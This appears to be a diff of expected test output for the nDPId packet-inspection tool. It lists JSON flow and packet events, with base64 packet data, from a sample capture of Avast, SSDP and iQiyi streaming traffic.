+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}}
 02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511fH70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1467353152692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353152692,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLGwAAAER1wTAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1467353155693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"ts_msec":1467353155693,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLG0AAAER1wPAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 01284{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-01176{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+01202{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00788{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="}
-00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
+00833{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}}
 02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OSxBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"}
 01346{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl84T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="}
